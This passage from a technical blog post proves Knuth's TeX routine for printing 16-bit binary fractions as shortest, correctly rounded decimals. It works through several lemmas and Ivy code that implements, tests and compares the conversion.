<i>Proof</i>. This follows immediately from the definition of accurate.<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mrow><mo>⌊</mo><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mi>f</mi></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>accurate]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo>⌊</mo><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>f</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[multiply</mtext><mspace width='0.3em' /><mtext>by</mtext><mspace width='0.3em' /></mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mn>½</mn></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>f</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[domain</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>floor;</mtext><mspace width='0.3em' /></mrow><mi>f</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mrow><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>an</mtext><mspace width='0.3em' /><mtext>integer]</mtext></mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>d</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>f</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>+</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>½</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>½</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[subtract</mtext><mspace width='0.3em' /><mtext>½]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>d</mi></mtd><mtd><mo>∈</mo></mtd><mtd 
style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>f</mi><mo>+</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[divide</mtext><mspace width='0.3em' /><mtext>by</mtext><mspace width='0.3em' /></mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mtext>]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
We have shown that <math><mi>d</mi></math> being accurate is equivalent to <math><mrow><mi>d</mi><mo>∈</mo><mi>f</mi><mo>+</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo stretchy=false>)</mo><mo>=</mo><mo stretchy=false>[</mo><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo stretchy=false>)</mo></mrow></math>.
</div>
<div class=lemma id=5digit>
<p>
<b><i>Five-Digit Lemma</i></b>. The correctly rounded 5-digit decimal <math><mrow><mi>d</mi><mo>=</mo><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mn>5</mn></msub></mrow></math>
sits inside the accuracy interval.
<p>
<i>Proof</i>.
Intuitively, the accuracy interval has width <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>16</mn></mrow></msup></mrow></math> while 5-digit decimals occur at
the narrower spacing <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>5</mn></mrow></msup></mrow></math>, so at least one such decimal appears inside each accuracy interval.
<p>
More precisely,<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>d</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo>⌊</mo><mrow><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup><mo>+</mo><mn>½</mn></mrow><mo>⌋</mo></mrow><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mi>d</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mi>f</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup><mo>+</mo><mn>½</mn><mo>−</mo><mo stretchy=false>[</mo><mn>0</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>1</mn><mo stretchy=false>)</mo><mo stretchy=false>)</mo><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[range</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>floor]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mi>f</mi><mo>−</mo><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>5</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>f</mi><mo>+</mo><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>5</mn></mrow></msup><mo stretchy=false>]</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow></mrow></mtd><mtd><mo>⊂</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo stretchy=false>]</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[</mtext><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>5</mn></mrow></msup><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mtext>]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
We have shown that the 5-digit correctly-rounded decimal for <math><mi>f</mi></math> is in the accuracy interval.
</div>
<p>
The problem statement and these two lemmas
lead to a trivial direct solution:
compute correctly rounded <math><mi>p</mi></math>-digit decimals
for increasing <math><mi>p</mi></math> and return the first accurate one.
<p>
We will implement that solution in
<a href="https://robpike.io/ivy">Ivy, an APL-like calculator language</a>.
Ivy has arbitrary-precision rationals and lightweight syntax,
making it a convenient tool for sketching and testing mathematical algorithms,
in the spirit of Iverson’s Turing Award lecture about APL,
“<a href="https://dl.acm.org/doi/pdf/10.1145/1283920.1283935">Notation as a Tool of Thought</a>.”
Like APL, Ivy uses strict right-to-left operator precedence:
<code>1+2*3+4</code> means <code>(1+(2*(3+4)))</code>,
and <code>floor 10 log f</code> means <code>floor (10 log f)</code>.
Operators can be prefix unary like <code>floor</code> or infix binary like <code>log</code>.
Each of the Ivy displays in this post is executable:
you can edit the code and re-run it by clicking the Play button (“▶️”).
A full introduction to Ivy is beyond the scope of this post;
see <a href="https://swtch.com/ivy/demo.html">the Ivy demo</a> for more examples.
<p>
To start, we need to build a small amount of Ivy scaffolding.
The binary operator <code>p digits d</code> splits an integer <code>d</code> into <code>p</code> digits:
<pre class='language-ivy'>op p digits d = (p rho 10) encode d
</pre>
<pre class='language-ivy'>3 digits 123
-- out --
1 2 3
</pre>
<pre class='language-ivy'>4 digits 123
-- out --
0 1 2 3
</pre>
<p>
Next, Ivy already provides <math><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow></math> and <math><mrow><mo>⌈</mo><mi>x</mi><mo>⌉</mo></mrow></math>,
but we need to define operators for <math><mrow><mo>[</mo><mi>x</mi><mo>]</mo></mrow></math>, <math><msub><mrow><mo>[</mo><mi>x</mi><mo>]</mo></mrow><mi>p</mi></msub></math>, <math><msub><mrow><mo>⌊</mo><mi>x</mi><mo>⌋</mo></mrow><mi>p</mi></msub></math>, and <math><msub><mrow><mo>⌈</mo><mi>x</mi><mo>⌉</mo></mrow><mi>p</mi></msub></math>.
<pre class='language-ivy'>op round x = floor x + 1/2
op p round x = (round x * 10**p) / 10**p
op p floor x = (floor x * 10**p) / 10**p
op p ceil x = (ceil x * 10**p) / 10**p
</pre>
<p>
(Because evaluation is strictly right-to-left, <code>floor x + 1/2</code> parses as <code>floor (x + 1/2)</code>;
also, <code>1/2</code> is a rational constant literal, not a division.)
<p>
Now we can write our trivial solution.
<pre class='language-ivy'>op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while 1
d = p round f
:if (min <= d) and (d < max)
:ret p digits d * 10**p
:end
p = p + 1
:end
</pre>
<a class=anchor href="#initial_proof_of_correctness"><h2 id="initial_proof_of_correctness">Initial Proof of Correctness</h2></a>
<p>
The correctness of <code>bin2dec</code> is simple to prove:
<ul>
<li>
The implementation of <code>round</code> is the mathematical definition of <math><mi>p</mi></math>-digit rounding,
so the result is correctly rounded.
<li>
By the <a href="#accuracy">Accuracy Lemma</a>, <math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math> are correctly defined
for use in the accuracy test <math><mrow><MI>𝑚𝑖𝑛</MI><mo>≤</mo><mi>d</mi><mo><</mo><MI>𝑚𝑎𝑥</MI><mo>,</mo></mrow></math>
so the result is accurate.
<li>
The loop considers correctly rounded forms
of increasing length until finding one that is accurate,
so the result must be shortest.
<li>
By the <a href="#5digit">Five-Digit Lemma</a>, the loop returns after at most 5 iterations, proving termination.</ul>
<p>
Therefore <code>bin2dec</code> returns the shortest accurate correctly rounded decimal for <math><mi>f</mi></math>.
<a class=anchor href="#testing"><h2 id="testing">Testing</h2></a>
<p>
Knuth’s motivating example was that the decimal 0.4 converted to binary and back
printed as 0.39999 in TeX.
Let’s define a decimal-to-binary converter and check how it handles 0.4.
<pre class='language-ivy'>op dec2bin f = (round f * 2**16) / 2**16
</pre>
<pre class='language-ivy'>dec2bin 0.4
-- out --
13107/32768
</pre>
<pre class='language-ivy'>dec2bin 0.39999
-- out --
13107/32768
</pre>
<pre class='language-ivy'>float dec2bin 0.4
-- out --
0.399993896484
</pre>
<p>
We can see that both <math><mn>0.4</mn></math> and <math><mn>0.39999</mn></math> read as <math><mrow><mn>26214/2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math>, or <math><mrow><mn>13107/2</mn><msup><mspace height='0.66em' /><mn>15</mn></msup></mrow></math> in reduced form.
The <code>float</code> operator converts that fraction to an Ivy floating-point value, which Ivy then prints
to a limited number of decimals.
We can see that 0.39999 is the correctly rounded 5-digit form.
<p>
Now let’s see how our printer does:
<pre class='language-ivy'>bin2dec dec2bin 0.4
-- out --
4
</pre>
<p>
It works! And it works for longer fractions as well:
<pre class='language-ivy'>bin2dec dec2bin 0.123
-- out --
1 2 3
</pre>
<p>
(The values being printed are vectors of digits of the decimal fraction.)
<p>
We can also implement Knuth’s solution, to compare against <code>bin2dec</code>.
<pre class='language-ivy'>op knuthP2 f =
n = f * 2**16
s = (10 * n) + 5
t = 10
d = ()
:while 1
:if t > 65536
s = s + 32768 - t/2
:end
d = d, floor s/65536
s = 10 * (s mod 65536)
t = 10 * t
:if s <= t
:ret d
:end
:end
</pre>
<p>
Compared to Knuth’s original program text,
the variable <code>d</code> is now an Ivy vector instead of a fixed-size array,
and the variable <code>j</code>, previously the number of entries used in the array,
remains only implicitly as the length of the vector.
The assignment ‘<i>j</i> := 0’ is now ‘<code>d = ()</code>’, initializing <math><mi>d</mi></math> to the empty vector.
And ‘<i>j</i> := <i>j</i> + 1; <i>d</i>[<i>j</i>] = <i>s</i> <b>div</b> 65536’
is now ‘<code>d = d, floor s/65536</code>’, appending <math><mrow><mo stretchy=false>⌊</mo><mrow><mi>s</mi><mn>/65536</mn></mrow><mo stretchy=false>⌋</mo></mrow></math> to <math><mi>d</mi></math>.
<pre class='language-ivy'>knuthP2 dec2bin 0.4
-- out --
4
</pre>
<p>
Now we can use testing to prove the absence of bugs.
We’ll be doing this repeatedly, so we will define <code>check desc</code>,
which prints the result of the test next to a description.
<pre class='language-ivy'>)origin 0
op check desc =
all = (iota 2**16) / 2**16
ok = (bin2dec@ all) === (knuthP2@ all)
print '❌✅'[ok] desc
check 'initial bin2dec'
-- out --
✅ initial bin2dec
</pre>
<p>
In this code, ‘<code>)origin 0</code>’ configures Ivy to make <code>iota</code> and array indices start at 0
instead of APL’s usual 1;
<code>all</code> is <math><mrow><mo stretchy=false>[</mo><mn>0</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo stretchy=false>)</mo><mn>/2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math>, all the 16-bit fractions;
<code>ok</code> is a boolean indicating whether <code>bin2dec</code> and <code>knuthP2</code> return
identical results on all inputs;
and the final line prints an emoji result and the description.
<p>
Of course, we want to do more than exhaustively check <code>knuthP2</code> against
our provably correct <code>bin2dec</code>.
We want to prove directly that the <code>knuthP2</code> code is correct.
We will do that by incrementally transforming <code>bin2dec</code> into <code>knuthP2</code>.
<a class=anchor href="#walking_digits"><h2 id="walking_digits">Walking Digits</h2></a>
<p>
We can start by simplifying the computation of decimals that are
shorter than necessary.
To build an intuition for that, it will help to look at
the accuracy intervals of short decimals.
Here are the intervals for our test case:
<pre class='language-ivy'>op show x = (mix 'min ' 'f' 'max'), mix '%.100g' text@ (dec2bin x) + (-1 0 1) * 2**-17
show 0.4
-- out --
min 0.39998626708984375
f 0.399993896484375
max 0.40000152587890625
</pre>
<p>
That printed the exact decimal values of
<math><mrow><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> (<math><MI>𝑚𝑖𝑛</MI></math>), <math><mi>f</mi></math>, and <math><mrow><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> (<math><MI>𝑚𝑎𝑥</MI></math>)
for <math><mrow><mi>f</mi><mo>=</mo><mtext>dec2bin</mtext><mo stretchy=false>(</mo><mn>0.4</mn><mo stretchy=false>)</mo><mo>=</mo><mrow><mo>[</mo><mrow><mn>0.4</mn><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow><mo>]</mo></mrow><MO>/</MO><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>=</mo><mn>26214/65536</mn></mrow></math>.
<p>
Here are a few cases that are longer but still short:
<pre class='language-ivy'>show 0.43
-- out --
min 0.42998504638671875
f 0.42999267578125
max 0.43000030517578125
</pre>
<pre class='language-ivy'>show 0.432
-- out --
min 0.43199920654296875
f 0.4320068359375
max 0.43201446533203125
</pre>
<pre class='language-ivy'>show 0.4321
-- out --
min 0.43209075927734375
f 0.432098388671875
max 0.43210601806640625
</pre>
<p>
These displays suggest a new strategy for <code>bin2dec</code>:
walk along the digits of these exact decimals until
<math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math> diverge at the <math><mi>p</mi></math>th decimal place.
At that point, we have found a <math><mi>p</mi></math>-digit decimal between <math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math>,
namely <math><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></math>.
That result is obviously accurate and shortest.
It is not obvious that the result is correctly rounded,
but that turns out to be the case for <math><mrow><mi>p</mi><mo>≤</mo><mn>4</mn></mrow></math>.
Intuitively, when <math><mi>p</mi></math> is shorter than necessary,
there are fewer <math><mi>p</mi></math>-digit decimals than 16-bit binary fractions,
so each accuracy interval can contain at most one decimal.
When the accuracy interval does contain a decimal,
that decimal must be both <math><msub><mrow><mo stretchy=false>[</mo><mi>f</mi><mo stretchy=false>]</mo></mrow><mi>p</mi></msub></math> and <math><msub><mrow><mo stretchy=false>⌊</mo><MI>𝑚𝑎𝑥</MI><mo stretchy=false>⌋</mo></mrow><mi>p</mi></msub></math>.
For the full-length case <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>, the accuracy interval can contain
multiple <math><mi>p</mi></math>-digit decimals,
so <math><msub><mrow><mo stretchy=false>[</mo><mi>f</mi><mo stretchy=false>]</mo></mrow><mi>p</mi></msub></math> and <math><msub><mrow><mo stretchy=false>⌊</mo><MI>𝑚𝑎𝑥</MI><mo stretchy=false>⌋</mo></mrow><mi>p</mi></msub></math> may differ.
<p>
We will prove that now.
<div class=lemma id=rounding>
<p>
<b><i>Rounding Lemma</i></b>. For <math><mrow><mi>p</mi><mo>≤</mo><mn>4</mn></mrow></math>, the accuracy interval contains at most one <math><mi>p</mi></math>-digit decimal.
If it does contain one,
that decimal is <math><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mi>p</mi></msub></math>,
the correctly rounded <math><mi>p</mi></math>-digit decimal for <math><mi>f</mi></math>.
<p>
<i>Proof</i>. By the definition of rounding, we know that <math><mrow><mi>d</mi><mo>=</mo><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mi>p</mi></msub></mrow></math> is <i>at most</i> <math><mrow><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup></mrow></math> away from <math><mi>f</mi></math>
and that any other <math><mi>p</mi></math>-digit decimal must be <i>at least</i> <math><mrow><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math> away from <math><mi>f</mi></math>.
Since <math><mrow><mn>½</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup><mo>></mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>, those other decimals cannot be in the accuracy interval:
the rounded <math><mi>d</mi></math> is the only possible option.
(The rounded <math><mi>d</mi></math> may or may not itself be in the accuracy interval,
but it’s our best and only hope. If it isn’t there, no <math><mi>p</mi></math>-digit decimal is.)
</div>
<div class=lemma id=endpoint>
<p>
<b><i>Endpoint Lemma</i></b>. The endpoints <math><mrow><mi>f</mi><mo>±</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> of the accuracy interval
are never <math><mi>p</mi></math>-digit decimals for <math><mrow><mi>p</mi><mo>≤</mo><mn>5</mn></mrow></math>,
nor are they shortest accurate correctly rounded decimals.
<p>
<i>Proof</i>.
Because <math><mrow><mi>f</mi><mo>=</mo><mi>n</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>16</mn></mrow></msup></mrow></math> for some integer <math><mi>n</mi></math>, <math><mrow><mi>f</mi><mo>±</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><mo>=</mo><mo stretchy=false>(</mo><mn>2</mn><mi>n</mi><mo>±</mo><mn>1</mn><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>.
If an endpoint were a decimal of 5 digits or fewer,
it would be an integer multiple of <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>5</mn></mrow></msup></mrow></math>,
but <math><mrow><mo stretchy=false>(</mo><mn>2</mn><mi>n</mi><mo>±</mo><mn>1</mn><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup><MO>/</MO><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>5</mn></mrow></msup><mo>=</mo><mo stretchy=false>(</mo><mo stretchy=false>(</mo><mn>2</mn><mi>n</mi><mo>±</mo><mn>1</mn><mo stretchy=false>)</mo><mo>·</mo><mn>5</mn><msup><mspace height='0.66em' /><mn>5</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>12</mn></mrow></msup></mrow></math> is an odd number divided by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>12</mn></msup></mrow></math>,
which cannot be an integer.
The contradiction proves that the endpoints cannot be exact decimals of 5 digits or fewer.
By the <a href="#5digit">Five-Digit Lemma</a>, the endpoints must also not be
shortest accurate correctly rounded decimals.
</div>
<div class=lemma id=truncating>
<p>
<b><i>Truncating Lemma</i></b>. For <math><mrow><mi>p</mi><mo>≤</mo><mn>4</mn></mrow></math>, the accuracy interval contains at most one <math><mi>p</mi></math>-digit decimal.
If it does contain one, that decimal is
<math><msub><mrow><mo>⌊</mo><mrow><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow><mo>⌋</mo></mrow><mi>p</mi></msub></math>, the <math><mi>p</mi></math>-digit truncation of the interval’s upper endpoint.
<p>
<i>Proof</i>. The <a href="#rounding">Rounding Lemma</a> established that the accuracy interval contains at most one <math><mi>p</mi></math>-digit decimal.
<p>
Let <math><mrow><MI>𝑚𝑖𝑛</MI><mo>=</mo><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math> and <math><mrow><MI>𝑚𝑎𝑥</MI><mo>=</mo><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>, so the accuracy interval is <math><mrow><mo stretchy=false>[</mo><MI>𝑚𝑖𝑛</MI><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><MI>𝑚𝑎𝑥</MI><mo stretchy=false>)</mo></mrow></math>.
Any <math><mi>p</mi></math>-digit decimal in that interval must also be in the narrower interval using <math><mi>p</mi></math>-digit endpoints<div class=math><math display=block><mrow><mrow><mo>[</mo><msub><mrow><mo>⌈</mo><MI>𝑚𝑖𝑛</MI><mo>⌉</mo></mrow><mi>p</mi></msub><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub><mo>]</mo></mrow><mn>.</mn></mrow></math></div>
<p>
This new interval is strictly narrower because, by the <a href="#endpoint">Endpoint Lemma</a>, <math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math> are not themselves <math><mi>p</mi></math>-digit decimals.
<p>
If <math><mrow><msub><mrow><mo>⌈</mo><MI>𝑚𝑖𝑛</MI><mo>⌉</mo></mrow><mi>p</mi></msub><mo>></mo><msub><mrow><mo>⌊</mo><MI>𝑚𝑎𝑥</MI><mo>⌋</mo></mrow><mi>p</mi></msub></mrow></math>, the interval is empty.
Otherwise, it clearly contains its upper endpoint, proving the lemma.
</div>
<p>
The <a href="#rounding">Rounding Lemma</a> and <a href="#truncating">Truncating Lemma</a> combine
to prove that when <math><mrow><mi>p</mi><mo>≤</mo><mn>4</mn></mrow></math> and the accuracy interval contains any <math><mi>p</mi></math>-digit decimal,
then it contains the single <math><mi>p</mi></math>-digit decimal<div class=math><math display=block><mrow><msub><mrow><mo>⌈</mo><mrow><mi>f</mi><MO lspace='0' rspace='0'>−</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow><mo>⌉</mo></mrow><mi>p</mi></msub><mo>=</mo><msub><mrow><mo>[</mo><mrow><mi>f</mi><mphantom class='vphantom'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></mphantom></mrow><mo>]</mo></mrow><mi>p</mi></msub><mo>=</mo><msub><mrow><mo>⌊</mo><mrow><mi>f</mi><MO lspace='0' rspace='0'>+</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow><mo>⌋</mo></mrow><mi>p</mi></msub><mn>.</mn></mrow></math></div>
<p>
The original <code>bin2dec</code> was written like this:
<pre class='language-ivy'>)op bin2dec
-- out --
op bin2dec f =
min = f - 2**-17
max = f + 2**-17
p = 1
:while 1
d = p round f
:if (min <= d) and (d < max)
:ret p digits d * 10**p
:end
p = p + 1
:end
</pre>
<p>
By the <a href="#5digit">Five-Digit Lemma</a>, we know that the loop terminates
in the fifth iteration, if not before.
Let’s move that fifth iteration down after the loop,
written as an unconditional return.
That leaves the loop body handling only the short conversions:
